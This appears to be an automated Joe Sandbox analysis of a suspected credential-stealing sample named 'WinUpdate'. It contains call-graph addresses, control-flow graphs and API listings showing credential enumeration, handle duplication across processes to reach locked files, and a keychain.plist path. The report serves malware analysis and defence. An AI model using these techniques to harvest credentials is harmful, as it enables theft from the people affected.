4373ca 40220->40221 40222 438460 134 API calls 40221->40222 40227 4251c4 137 API calls 40221->40227 40231 415a91 memset 40221->40231 40234 43758f 40221->40234 40246 437584 40221->40246 40249 437d3c 135 API calls 40221->40249 40297 425433 13 API calls 40221->40297 40298 425413 17 API calls 40221->40298 40299 42533e 16 API calls 40221->40299 40300 42538f 16 API calls 40221->40300 40301 42453e 123 API calls 40221->40301 40222->40221 40223 4375bc 40225 415c7d 16 API calls 40223->40225 40226 4375d2 40225->40226 40228 4442e6 11 API calls 40226->40228 40248 4373a7 40226->40248 40227->40221 40229 4375e2 40228->40229 40229->40248 40304 444283 13 API calls 40229->40304 40231->40221 40302 42453e 123 API calls 40234->40302 40237 4375f4 40240 437620 40237->40240 40241 43760b 40237->40241 40239 43759f 40242 416935 16 API calls 40239->40242 40244 416935 16 API calls 40240->40244 40305 444283 13 API calls 40241->40305 40242->40246 40244->40248 40246->40223 40303 42453e 123 API calls 40246->40303 40247 437612 memcpy 40247->40248 40248->40183 40249->40221 40250->40167 40251->40186 40252->40184 40253->40167 40254->40191 40255->40201 40256->40197 40257->40191 40258->40191 40260 41bc3b 101 API calls 40259->40260 40261 41f1b4 40260->40261 40262 41edad 86 API calls 40261->40262 40269 41f282 40261->40269 40263 41f1cb 40262->40263 40264 41f1f5 memcmp 40263->40264 40265 41f20e 40263->40265 40263->40269 40264->40265 40266 41f21b memcmp 40265->40266 40265->40269 40267 41f326 40266->40267 40270 41f23d 40266->40270 40268 41ee6b 86 API calls 40267->40268 40267->40269 40268->40269 40269->40210 40270->40267 40271 41f28e memcmp 40270->40271 40273 41c8df 56 API calls 40270->40273 40271->40267 40272 41f2a9 40271->40272 40272->40267 40275 41f308 40272->40275 40276 41f2d8 40272->40276 40274 41f269 40273->40274 40274->40267 40277 41f287 40274->40277 40278 41f27a 40274->40278 40275->40267 40282 4446ce 11 API calls 40275->40282 40279 41ee6b 86 API calls 40276->40279 40277->40271 40280 41ee6b 86 API calls 40278->40280 40281 41f2e0 40279->40281 40280->40269 40283 41b1ca memset 40281->40283 40282->40267 40283->40269 40284->40210 40285->40210 40286->40210 40287->40204 40288->40205 40290 417044 40289->40290 40291 41705c 40289->40291 40293 416760 11 API calls 40290->40293 40295 417055 40290->40295 40292 417075 40291->40292 40294 41707a 11 API calls 40291->40294 40292->40216 40293->40295 40294->40290 40295->40216 40296->40248 40297->40221 40298->40221 40299->40221 40300->40221 40301->40221 40302->40239 40303->40223 40304->40237 40305->40247 40311 415cfe 40306->40311 40315 415d23 __aullrem __aulldvrm 40311->40315 40318 41628e 40311->40318 40312 4163ca 40325 416422 11 API calls 40312->40325 40314 416172 memset 40314->40315 40315->40312 40315->40314 40316 416422 10 API calls 40315->40316 40317 415cb9 10 API calls 40315->40317 40315->40318 40316->40315 40317->40315 40319 416520 40318->40319 40320 416527 40319->40320 40324 416574 40319->40324 40321 416544 40320->40321 40320->40324 40326 4156aa 11 API calls 40320->40326 40323 416561 memcpy 40321->40323 40321->40324 40323->40324 40324->40120 40325->40318 40326->40321 40348 41493c EnumResourceNamesW 37671 4287c1 37672 4287d2 37671->37672 37673 429ac1 37671->37673 37674 428818 37672->37674 37675 42881f 37672->37675 37690 425711 37672->37690 37685 425ad6 37673->37685 37741 415c56 11 API calls 37673->37741 37708 42013a 37674->37708 37736 420244 97 API calls 37675->37736 37680 4260dd 37735 424251 120 API calls 37680->37735 37682 4259da 37734 416760 11 API calls 37682->37734 37688 422aeb memset memcpy memcpy 37688->37690 37689 429a4d 37691 429a66 37689->37691 37695 429a9b 37689->37695 37690->37673 37690->37682 37690->37688 37690->37689 37693 4260a1 37690->37693 37704 4259c2 37690->37704 37707 425a38 37690->37707 37724 4227f0 memset memcpy 37690->37724 37725 422b84 15 API calls 37690->37725 37726 422b5d memset memcpy memcpy 37690->37726 37727 422640 13 API calls 37690->37727 37729 4241fc 11 API calls 37690->37729 37730 42413a 90 API calls 37690->37730 37737 415c56 11 API calls 37691->37737 37733 415c56 11 API calls 37693->37733 37696 429a96 37695->37696 37739 416760 11 API calls 37695->37739 37740 424251 120 API calls 37696->37740 37698 429a7a 37738 416760 11 API calls 37698->37738 37704->37685 37728 415c56 11 API calls 37704->37728 37707->37704 37731 422640 13 API calls 37707->37731 37732 4226e0 12 API calls 37707->37732 37709 42014c 37708->37709 37712 420151 37708->37712 37751 41e466 97 API calls 37709->37751 37711 420162 37711->37690 37712->37711 37713 4201b3 37712->37713 37714 420229 37712->37714 37715 4201b8 37713->37715 37716 4201dc 37713->37716 37714->37711 37717 41fd5e 86 API calls 37714->37717 37742 41fbdb 37715->37742 37716->37711 37720 4201ff 37716->37720 37748 41fc4c 37716->37748 37717->37711 37720->37711 37723 42013a 97 API calls 37720->37723 37723->37711 37724->37690 37725->37690 37726->37690 37727->37690 37728->37682 37729->37690 37730->37690 37731->37707 37732->37707 37733->37682 37734->37680 37735->37685 37736->37690 37737->37698 37738->37696 37739->37696 37740->37673 37741->37682 37743 41fbf1 37742->37743 37744 41fbf8 37742->37744 37747 41fc39 37743->37747 37766 4446ce 11 API calls 37743->37766 37756 41ee26 37744->37756 37747->37711 37752 41fd5e 37747->37752 37749 41ee6b 86 API calls 37748->37749 37750 41fc5d 37749->37750 37750->37716 37751->37712 37754 41fd65 37752->37754 37753 41fdab 37753->37711 37754->37753 37755 41fbdb 86 API calls 37754->37755 37755->37754 37757 41ee41 37756->37757 37758 41ee32 37756->37758 37767 41edad 37757->37767 37770 4446ce 11 API calls 37758->37770 37761 41ee3c 37761->37743 37764 41ee58 37764->37761 37772 41ee6b 37764->37772 37766->37747 37776 41be52 37767->37776 37770->37761 37771 41eb85 11 API calls 37771->37764 37773 41ee70 37772->37773 37774 41ee78 37772->37774 37829 41bf99 86 API calls 37773->37829 37774->37761 37777 41be6f 37776->37777 37778 41be5f 37776->37778 37784 41be8c 37777->37784 37808 418c63 memset memset 37777->37808 37807 4446ce 11 API calls 37778->37807 37780 41be69 37780->37761 37780->37771 37782 41bee7 37782->37780 37812 41a453 86 API calls 37782->37812 37784->37780 37784->37782 37785 41bf3a 37784->37785 37786 41bed1 37784->37786 37811 4446ce 11 API calls 37785->37811 37788 41bef0 37786->37788 37791 41bee2 37786->37791 37788->37782 37790 41bf01 37788->37790 37789 41bf24 memset 37789->37780 37790->37789 37792 41bf14 37790->37792 37809 418a6d memset memcpy memset 37790->37809 37797 41ac13 37791->37797 37810 41a223 memset memcpy memset 37792->37810 37796 41bf20 37796->37789 37798 41ac3f memset 37797->37798 37800 41ac52 37797->37800 37799 41acd9 37798->37799 37799->37782 37802 41ac6a 37800->37802 37813 41dc14 19 API calls 37800->37813 37803 41aca1 37802->37803 37814 41519d 37802->37814 37803->37799 37805 41acc0 memset 37803->37805 37806 41accd memcpy 37803->37806 37805->37799 37806->37799 37807->37780 37808->37784 37809->37792 37810->37796 37811->37782 37813->37802 37817 4175ed 37814->37817 37825 417570 SetFilePointer 37817->37825 37820 41760a ReadFile 37821 417637 37820->37821 37822 417627 GetLastError 37820->37822 37823 4151b3 37821->37823 37824 41763e memset 37821->37824 37822->37823 37823->37803 37824->37823 37826 4175b2 37825->37826 37827 41759c GetLastError 37825->37827 37826->37820 37826->37823 37827->37826 37828 4175a8 GetLastError 37827->37828 37828->37826 37829->37774 37830 417bc5 37831 417c61 37830->37831 37836 417bda 37830->37836 37832 417bf6 UnmapViewOfFile CloseHandle 37832->37832 37832->37836 37834 417c2c 37834->37836 37842 41851e 20 API calls 37834->37842 37836->37831 37836->37832 37836->37834 37837 4175b7 37836->37837 37838 4175d6 CloseHandle 37837->37838 37839 4175c8 37838->37839 37840 4175df 37838->37840 37839->37840 37841 4175ce Sleep 37839->37841 37840->37836 37841->37838 37842->37834 39800 4147f3 39803 414561 39800->39803 39802 414813 39804 41456d 39803->39804 39805 41457f GetPrivateProfileIntW 39803->39805 39808 4143f1 memset _itow WritePrivateProfileStringW 39804->39808 39805->39802 39807 41457a 39807->39802 39808->39807

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 354 40de5a 351->354 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 356 40de5d-40de63 354->356 358 40de74-40de78 356->358 359 40de65-40de6c 356->359 358->352 358->356 359->358 361 40de6e-40de71 359->361 361->358 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 381 40df23-40df4a GetCurrentProcess DuplicateHandle 379->381 380->378 382 40dfd1-40dfd3 380->382 381->380 383 40df4c-40df76 memset call 41352f 381->383 382->377 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                                                                                                                                • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                                                                                                                                                                                                                • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                                                                                                                                                                • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                                                                                                                                                • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                                                                                                                                                                                                                                • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                                                                                                                                                                                                                                • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                                                                                                                                                                                                                                • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 0040DF5F
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                                                                                                                                                                                                                                                • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                                                                                                                                                                                                                                                • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                                                                                                                                                                                                                                • API String ID: 708747863-3398334509
                                                                                                                                                                                                                                                                                                • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                                                                                                                                                                                                • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                                                                                                                                • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                                                                                                                                                                                                                • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                                                                                                                                                                                                                                • free.MSVCRT ref: 00418803
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1355100292-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                                                                                                                                                                                                                • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                                                                                                                                                                                                                • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: FileFind$FirstNext
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1690352074-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                                                                                                                                                                • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 0041898C
                                                                                                                                                                                                                                                                                                • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: InfoSystemmemset
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3558857096-0
                                                                                                                                                                                                                                                                                                • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                                                                                                                                                                • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 38 44558e-445594 call 444b06 4->38 39 44557e-44558c call 4136c0 call 41366b 4->39 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 42 445823-445826 14->42 15->16 22 445672-445683 call 40a889 call 403fbe 16->22 23 4455fb-445601 16->23 49 445879-44587c 18->49 24 44594f-445958 19->24 25 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->25 82 445685 22->82 83 4456b2-4456b5 call 40b1ab 22->83 34 445605-445607 23->34 35 445603 23->35 32 4459f2-4459fa 24->32 33 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 24->33 134 44592d-445945 call 40b6ef 25->134 135 44594a 25->135 44 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 32->44 45 445b29-445b32 32->45 153 4459d0-4459e8 call 40b6ef 33->153 154 4459ed 33->154 34->22 41 445609-44560d 34->41 35->34 38->3 39->38 41->22 50 44560f-445641 call 4087b3 call 40a889 call 4454bf 41->50 51 44584c-445854 call 40b1ab 42->51 52 445828 42->52 182 445b08-445b15 call 40ae51 44->182 53 445c7c-445c85 45->53 54 445b38-445b96 memset * 3 45->54 63 4458a2-4458aa call 40b1ab 49->63 64 44587e 49->64 150 445665-445670 call 40b1ab 50->150 151 445643-445663 call 40a9b5 call 4087b3 50->151 51->13 66 44582e-445847 call 40a9b5 call 4087b3 52->66 60 445d1c-445d25 53->60 61 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->61 67 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->67 68 445b98-445ba0 54->68 87 445fae-445fb2 60->87 88 445d2b-445d3b 60->88 168 445cf5 61->168 169 445cfc-445d03 61->169 63->19 80 445884-44589d call 40a9b5 call 4087b3 64->80 137 445849 66->137 247 445c77 67->247 68->67 81 445ba2-445bcf call 4099c6 call 445403 call 445389 68->81 156 44589f 80->156 81->53 99 44568b-4456a4 call 40a9b5 call 4087b3 82->99 115 4456ba-4456c4 83->115 89 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 88->89 90 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 88->90 162 445d67-445d6c 89->162 163 445d71-445d83 call 445093 89->163 196 445e17 90->196 197 445e1e-445e25 90->197 158 4456a9-4456b0 99->158 129 4457f9 115->129 130 4456ca-4456d3 call 413cfa call 413d4c 115->130 129->6 172 4456d8-4456f7 call 40b2cc call 413fa6 130->172 134->135 135->24 137->51 150->115 151->150 153->154 154->32 156->63 158->83 158->99 174 445fa1-445fa9 call 40b6ef 162->174 163->87 168->169 179 445d05-445d13 169->179 180 445d17 169->180 205 4456fd-445796 memset * 4 call 409c70 * 3 172->205 206 4457ea-4457f7 call 413d29 172->206 174->87 179->180 180->60 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->45 201->182 219 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->219 242 445e62-445e69 202->242 243 445e5b 202->243 218 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->218 205->206 246 445798-4457ca call 40b2cc call 409d1f call 409b98 205->246 206->10 218->87 255 445f9b 218->255 219->182 242->203 248 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 242->248 243->242 246->206 265 4457cc-4457e5 call 4087b3 246->265 247->53 264 445f4d-445f5a call 40ae51 248->264 255->174 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->206 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->218 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 004455C2
                                                                                                                                                                                                                                                                                                • wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 0044570D
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00445725
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040BDB0: CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 0044573D
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00445755
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 004458CB
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 004458E3
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 0044596E
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00445A10
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00445A28
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00445AC6
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00445B52
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00445B6A
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00445C9B
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00445CB3
                                                                                                                                                                                                                                                                                                • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00445B82
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00445986
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2213116067.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_WinUpdate.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                                                                                                                                                                                                                                • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                                                                                                                                                                                                                • API String ID: 2263259095-3798722523
